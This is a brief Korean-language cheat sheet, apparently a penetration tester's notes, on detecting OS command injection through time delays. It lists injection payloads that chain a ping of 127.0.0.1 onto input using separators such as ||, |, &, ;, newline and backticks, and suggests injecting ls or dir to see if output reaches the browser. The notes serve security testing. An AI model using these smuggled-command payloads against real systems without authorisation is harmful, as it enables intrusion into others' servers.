OS command injection 테스트

Blind injection 과 유사하게 시간 지연을 이용

ex) 

|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &

| ping -i 30 127.0.0.1

| ping -n 30 127.0.0.1

& ping -i 30 127.0.0.1

| ping -n 30 127.0.0.1

; ping 127.0.0.1

%0a ping -i 30 127.0.0.1 `0a

' ping 127.0.0.1 `

기타 ls나 dir 등을 입력하여 브라우저에서 보여지는 부분이 있는지 확인